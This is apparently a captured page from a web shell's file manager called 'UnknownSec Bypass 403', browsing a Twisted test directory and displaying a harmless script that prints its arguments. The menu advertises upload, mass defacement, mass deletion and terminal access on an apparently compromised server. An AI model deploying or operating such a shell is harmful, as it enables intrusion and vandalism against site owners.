UnknownSec Bypass
403
:
/
lib
/
python3
/
dist-packages
/
twisted
/
test
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
process_cmdline.py
""" Write to stdout the command line args it received, one per line. """ from __future__ import print_function import sys for x in sys.argv[1:]: print(x)
Copyright © 2025 - UnknownSec